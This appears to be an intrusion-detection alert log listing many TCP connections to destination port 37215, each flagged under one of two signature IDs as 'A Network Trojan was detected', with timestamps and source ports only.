              Timestamp:05/24/24-10:59:26.150549
              SID:2835222
              Source Port:57468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727035
              SID:2835222
              Source Port:46906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235547
              SID:2829579
              Source Port:45212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518957
              SID:2835222
              Source Port:60402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441936
              SID:2829579
              Source Port:42808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454565
              SID:2829579
              Source Port:55292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596321
              SID:2835222
              Source Port:46342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798973
              SID:2835222
              Source Port:49468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078693
              SID:2835222
              Source Port:53502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2835222
              Source Port:36676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480461
              SID:2829579
              Source Port:53960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625190
              SID:2835222
              Source Port:56758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485725
              SID:2829579
              Source Port:39564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112020
              SID:2835222
              Source Port:57636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697401
              SID:2829579
              Source Port:38876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349878
              SID:2829579
              Source Port:35564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491493
              SID:2835222
              Source Port:39692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198776
              SID:2829579
              Source Port:44274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624880
              SID:2835222
              Source Port:45998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661131
              SID:2829579
              Source Port:43800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063081
              SID:2829579
              Source Port:57410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692537
              SID:2829579
              Source Port:36044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801853
              SID:2829579
              Source Port:55544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449919
              SID:2835222
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550787
              SID:2829579
              Source Port:47700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057244
              SID:2835222
              Source Port:52570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534408
              SID:2835222
              Source Port:41398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406598
              SID:2829579
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430515
              SID:2829579
              Source Port:49888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245759
              SID:2829579
              Source Port:41214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833206
              SID:2829579
              Source Port:53598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.632774
              SID:2835222
              Source Port:43436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064587
              SID:2829579
              Source Port:45766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120404
              SID:2829579
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447233
              SID:2829579
              Source Port:36178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725339
              SID:2835222
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057562
              SID:2829579
              Source Port:37416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396079
              SID:2829579
              Source Port:55978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550798
              SID:2829579
              Source Port:56354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695691
              SID:2835222
              Source Port:50312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374511
              SID:2835222
              Source Port:40118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059510
              SID:2829579
              Source Port:45278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595411
              SID:2835222
              Source Port:60154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152867
              SID:2835222
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546483
              SID:2835222
              Source Port:39440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636882
              SID:2829579
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396629
              SID:2829579
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724916
              SID:2835222
              Source Port:59854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768125
              SID:2835222
              Source Port:55932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110821
              SID:2829579
              Source Port:44930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313701
              SID:2835222
              Source Port:35190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572057
              SID:2829579
              Source Port:55288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574729
              SID:2829579
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287939
              SID:2829579
              Source Port:48020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.665007
              SID:2835222
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797631
              SID:2835222
              Source Port:40566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873858
              SID:2835222
              Source Port:59400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279784
              SID:2829579
              Source Port:34418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345358
              SID:2835222
              Source Port:48734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128117
              SID:2829579
              Source Port:36016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928658
              SID:2829579
              Source Port:39062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554228
              SID:2835222
              Source Port:54942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797717
              SID:2829579
              Source Port:46074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040831
              SID:2835222
              Source Port:57992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628035
              SID:2829579
              Source Port:38072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884563
              SID:2829579
              Source Port:46890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123705
              SID:2829579
              Source Port:55722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459924
              SID:2829579
              Source Port:44166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402772
              SID:2835222
              Source Port:51352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750623
              SID:2835222
              Source Port:50268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752052
              SID:2835222
              Source Port:38584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481317
              SID:2835222
              Source Port:52062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251661
              SID:2829579
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856933
              SID:2835222
              Source Port:50484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671783
              SID:2829579
              Source Port:38578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450581
              SID:2829579
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990657
              SID:2829579
              Source Port:37374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425809
              SID:2835222
              Source Port:34734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570484
              SID:2829579
              Source Port:33670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681012
              SID:2835222
              Source Port:37388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378044
              SID:2835222
              Source Port:48324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098250
              SID:2829579
              Source Port:37620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700613
              SID:2829579
              Source Port:35234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099738
              SID:2835222
              Source Port:54710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517412
              SID:2835222
              Source Port:46918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061783
              SID:2829579
              Source Port:43616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538054
              SID:2835222
              Source Port:33016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481376
              SID:2835222
              Source Port:55526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124075
              SID:2829579
              Source Port:49824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100636
              SID:2829579
              Source Port:47460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205932
              SID:2835222
              Source Port:40334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111486
              SID:2829579
              Source Port:50924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801849
              SID:2835222
              Source Port:42952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860066
              SID:2829579
              Source Port:38264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969134
              SID:2829579
              Source Port:42748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726391
              SID:2835222
              Source Port:33782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483548
              SID:2835222
              Source Port:53974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188171
              SID:2829579
              Source Port:36834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059603
              SID:2829579
              Source Port:48292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123253
              SID:2829579
              Source Port:54090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856517
              SID:2835222
              Source Port:59000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157705
              SID:2835222
              Source Port:52736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994269
              SID:2829579
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187072
              SID:2829579
              Source Port:37120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103376
              SID:2829579
              Source Port:47834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921316
              SID:2829579
              Source Port:40698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235489
              SID:2829579
              Source Port:53016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681336
              SID:2835222
              Source Port:37048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076308
              SID:2835222
              Source Port:45886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423420
              SID:2829579
              Source Port:55032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099683
              SID:2829579
              Source Port:56966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574408
              SID:2829579
              Source Port:38452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606402
              SID:2835222
              Source Port:38336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882766
              SID:2829579
              Source Port:40944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403027
              SID:2835222
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267223
              SID:2829579
              Source Port:37112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199787
              SID:2829579
              Source Port:45570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341234
              SID:2829579
              Source Port:51212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459500
              SID:2829579
              Source Port:44230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487010
              SID:2829579
              Source Port:36590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347008
              SID:2829579
              Source Port:45612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078152
              SID:2835222
              Source Port:40700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076933
              SID:2829579
              Source Port:43864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858930
              SID:2835222
              Source Port:33244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070919
              SID:2829579
              Source Port:60176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206392
              SID:2829579
              Source Port:37256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474583
              SID:2835222
              Source Port:43100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268615
              SID:2835222
              Source Port:57718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485266
              SID:2835222
              Source Port:47572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492306
              SID:2829579
              Source Port:41452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334185
              SID:2829579
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596497
              SID:2829579
              Source Port:40672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926725
              SID:2829579
              Source Port:56198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631866
              SID:2835222
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358917
              SID:2835222
              Source Port:56490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823347
              SID:2835222
              Source Port:53346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799242
              SID:2835222
              Source Port:59614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535054
              SID:2835222
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396392
              SID:2835222
              Source Port:38154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576556
              SID:2829579
              Source Port:44306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483159
              SID:2829579
              Source Port:39296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856919
              SID:2829579
              Source Port:58730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057586
              SID:2829579
              Source Port:58602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159811
              SID:2829579
              Source Port:48784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420905
              SID:2829579
              Source Port:57034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875722
              SID:2835222
              Source Port:48982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251618
              SID:2835222
              Source Port:33730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065812
              SID:2829579
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477868
              SID:2829579
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633621
              SID:2829579
              Source Port:53152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372556
              SID:2829579
              Source Port:51100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552815
              SID:2829579
              Source Port:43254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642073
              SID:2835222
              Source Port:37458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661261
              SID:2835222
              Source Port:37268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664519
              SID:2835222
              Source Port:38722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624129
              SID:2829579
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.071005
              SID:2829579
              Source Port:54678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725481
              SID:2829579
              Source Port:34058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099542
              SID:2829579
              Source Port:60004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205318
              SID:2835222
              Source Port:39502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287906
              SID:2835222
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625681
              SID:2835222
              Source Port:57968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591720
              SID:2829579
              Source Port:44496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859056
              SID:2835222
              Source Port:45406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503006
              SID:2835222
              Source Port:53272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537633
              SID:2835222
              Source Port:41616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537242
              SID:2835222
              Source Port:38172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763323
              SID:2835222
              Source Port:38832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599137
              SID:2829579
              Source Port:35938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860127
              SID:2835222
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920479
              SID:2835222
              Source Port:51844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283530
              SID:2829579
              Source Port:46940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124053
              SID:2835222
              Source Port:60250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300063
              SID:2835222
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456913
              SID:2835222
              Source Port:49778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502535
              SID:2829579
              Source Port:37324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643472
              SID:2835222
              Source Port:41964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595443
              SID:2829579
              Source Port:56492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928617
              SID:2835222
              Source Port:60964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661907
              SID:2829579
              Source Port:53656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579380
              SID:2835222
              Source Port:59428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456848
              SID:2829579
              Source Port:33872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831444
              SID:2835222
              Source Port:50590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189491
              SID:2829579
              Source Port:38732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574779
              SID:2835222
              Source Port:40996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549234
              SID:2835222
              Source Port:36216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596071
              SID:2835222
              Source Port:41096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623647
              SID:2829579
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636542
              SID:2829579
              Source Port:40910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518935
              SID:2835222
              Source Port:56702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120768
              SID:2835222
              Source Port:52518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536034
              SID:2829579
              Source Port:48920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519590
              SID:2835222
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186077
              SID:2829579
              Source Port:42438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445782
              SID:2835222
              Source Port:58594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481856
              SID:2835222
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486176
              SID:2835222
              Source Port:60152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494730
